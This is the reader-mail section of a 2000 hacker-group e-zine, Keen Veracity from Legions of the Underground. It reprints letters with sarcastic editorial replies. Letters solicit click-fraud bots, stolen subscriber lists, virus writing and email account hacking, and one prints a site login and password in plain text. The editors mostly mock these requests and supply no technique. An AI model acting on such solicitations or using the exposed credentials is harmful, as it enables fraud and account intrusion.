>will be greatful if you would help me out > Thank You > Rumy Mirza > > reply to : rumymirza@hotmail.com > > /* heeeh. */ ---------- Forwarded message ---------- Date: Tue, 06 Jun 2000 01:40:30 -0400 From: Anthony R Tenkotte To: webmaster@legions.org Subject: Hacking Hey Web master i want to know it i can join your club or become an member and i would also like to ask you would you please tell me if any body on your member list has icq or aol instant messanger if any of them do whats their icq num or their screen name for aol instant messanger. I hope you reply with at least 3 good things if not oh well ill half to try again well i g2g bye. /* Uhm. We all use AOL. Really we do. BWAHAHA. No, really, everyone uses IRC, on undernet #legions. As far as ICQ goes, some use it, some don't. */ Date: Tue, 6 Jun 2000 14:20:08 -0400 From: Joe Cambareri To: digiebola@hackphreak.org Subject: Changing IP address Im looking for a way to change my IP address I use a cable modem through Optimum online and the external Terayon modem. Because of the cable modem my IP address remains the same whenever i open a site. Im not looking to change my IP address for illegal purposes. But if it is possible id like to hide the server i use (optimum online) and change my IP address. thank you if you can help me, otherwise thanks for your time. /* Sounds pretty illegal to me. You really need to figure out how your access is being granted, either DHCP or some other way, maybe a password in the cable modem? I would think it's safe to say, even if you did change your IP, your ISP will catch on, and then terminate your account. Be really careful. */ Date: Wed, 07 Jun 2000 01:49:09 -0500 From: siemeale To: digiebola@hackphreak.org Subject: request do you have game tempest 2000 /* What the hell is tempest 2000? 
*/ Date: 8 Jun 00 11:34:30 MDT From: aaaaa aaaaa To: digiebola@hackphreak.org to Digital Ebola greetings, i am known as brief vegeta, and i have known you as a member of the underground i request to you, that if possible, please tell me how to be a member of the legion, like you are and no, im not just another nerd that's cursed by the world of hacking, i have my own abilities and would like to aid the lou thats all i have for this letter, good luck /* To mister quick vegetable: We at LoU appreciate the support, but if you would really like to aid us, you can please send us lots and lots of money, or write us a article for Keen Veracity. Money is preferred. */ te: Sun, 11 Jun 2000 06:25:38 PDT From: Jonathan Roe To: digiebola@hackphreak.org Subject: Question: Hey! Are you familiar with the AllAdvantage software that is used to trick it into thinking you are surfing? Do you think it would be possible to do something like that with ClickThru.com? (You can use my username: grey_rook and passwd: tikki to check it out without haaving to register.) Go to the "Surf" link and then click on one of the links that are listed. A Pop-up window comes up and once the page loads you can vote on how much you like the site to get the credit. You have to spend 30 seconds on each site. So, would it be possible to write a program that clicks on the "Next Site" link, waits 30 seconds, picks a random number (1 through 5) to vote and then clicks the "Next Site" and goes through the loop over and over again? I would prefer it be written in a Windoze compatible language or Linux would be OK, but I need help getting RedHat 5.2 to recognize COM5 (cua4). Email me back please on your ideas and if I can PLEASE get you to code it. If you are wondering why I want a program like this, I'm going to use it to get click throughs to the link that I provided on where to send other ClickThru.com members. That link is from an advertising company that allows blind links. 
I get 3 cents per click since it is a blind link so if you code the program, and it generates the 120 click throughs an hour, I would make $31536 a year. Not bad for someone who is a Junior in high school. Of course if you want to generate some extra cash along with me then that is expected. I just need a working copy of the program. Thanks! Jonathan /* 31536 BUCKS@!#$? */ To: digiebola@hackphreak.org Subject: t shirt!!! mom wants tshirt from rootfest!!! love mom /* Ah, you gotta love those moms who take pride in everything you do... */ To: digiebola@hackphreak.org Subject: hi t-shirt please ...love mom /* now, she is just getting to be annoying.... */ From: eric e To: digiebola@hackphreak.org Subject: FWD: Who is Jack Schitt? Parts/Attachments: 1 Shown 5 lines Text 2 Shown 2.3 KB Message, "FWD: Who is Jack Schitt?" 2.1 Shown 75 lines Text ---------------------------------------- Check this joke out!!! ---------- Original Message ---------------------------------- From: "Hailey Dawson" Date: Thu, 01 Jun 2000 21:43:19 CDT Who is Jack Schitt? The lineage is finally revealed. Many people are at a loss for a response when someone says; "You don't know Jack Schitt." Now you can intellectually handle the situation. Jack is the only son of Awe Schitt and O. Schitt. Awe Schitt, the fertilizer magnate, married O. Schitt, the owner of the Needeep N. Schitt, Inc. They had one son, Jack. In turn, Jack Schitt married Noe Schitt. They produced four children named Dip Schitt, Holie Schitt, Fulla Schitt, and Giva Schitt. However, after being married 15 years, Jack and Noe Schitt divorced. Noe Schitt later remarried Ted Sherlock and since her kids were living with her she wanted to keep her previous name. She was then known as Noe Schitt-Sherlock. Meanwhile, Dip Schitt married Loada Schitt and they produced a son of nervous disposition named Chicken Schitt. 
Two of Noe's four children, Fulla Schitt and Giva Schitt were inseparable throughout childhood and subsequently married the Happens brothers in a dual ceremony. The wedding announcement in the newspaper announced the Schitt- Happens wedding. The Schitt-Happens had four children named Dawg, Byrd, Hoarse, and Bull. Bull left home to tour the world and returned with his new Italian bride, Pisa Schitt. So, now when someone says, "You don't know Jack Schitt", you can correct them. Family history as recorded by Crock O. Schitt /* oh shit... */ Date: Sat, 17 Jun 2000 02:48:32 -0700 (PDT) From: Caesar Kidd To: deth@errata.net, digiebola@hackphreak.org, fejed@legions.org, lothos@rootfest.org, x-empt@ispep.cx, shadows@legions.org hi guys i need some help. i wanna to know how to open zipped file without using password recovery. i really need your help. i'm counting on you guys. thanx /* still counting? */ Date: Mon, 19 Jun 2000 12:43:53 +0200 From: Natalini To: digiebola@hackphreak.org Subject: Da Lucien I want subscribe to the your mailing list My e-mail is luciano46@hotmail.com /* Ok, 50 gigs of pr0n coming right up!!!! */ From: fejed To: digiebola@hackphreak.org Cc: digi@legions.org Subject: i don't have perm for mail i don't have permission for /var/mail/fejed on cyberspace7, resolve this. /* Thats strange, I can't read your nasty house wife sex stories, err I mean mail either.... */ Date: Fri, 23 Jun 2000 09:55:36 GMT From: VIKAS YADAV To: digiebola@hackphreak.org Subject: http://www.legions.org/members.html iam looking for hackers to get me the list of subscribers of www.indiainfoline.com. iam ready tp pay 250 - 300 $(american). If you can help then. please reply to me. otherwise please guide me to the person who can help me. thanking u in advance. for ur help. by the way iam also a hacker and my home page can be accessed at http://206.98.154.54 /* dude. 
it's gonna cost you *stick finger in mouth* 1 MILLION DOLLARS */ Date: Fri, 23 Jun 2000 01:50:05 -0700 From: JJ Allen Steelman To: digiebola@hackphreak.org Subject: help I got your mail from afriend if you know what your doing I am a rookie and need some teaching if you know anyone in the denver area contact me and help! Or if you can help will ove teh assist. Grifter /* sorry, please talk to fejed... */ Date: Wed, 28 Jun 2000 10:41:48 GMT From: max cipto To: digiebola@hackphreak.org hello... i'm max, 21 year old, indonesian, still study.. i'm a beginner. can you teach me how to write a virus? what program should i use? and anything about virus? how to hack hotmail or yahoo password ? i hope you can reply me email..? thank you very much... your student.. /* and the first lesson of today is to run your happy ass to the store and pick digi up a cold case of beer.... */ -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect! If you have an idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudiced in any way shape or form, so even an AOLer's article may be published if it seems that it has a clue. Or then again, maybe hell will freeze over! Anyone's stuff may be published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is an equal opportunity destroyer.
-------------------------------------------------------------------------------- All submissions to: digi@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____| \_____/ \_____/ z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* --------------------------------------------------------------------------------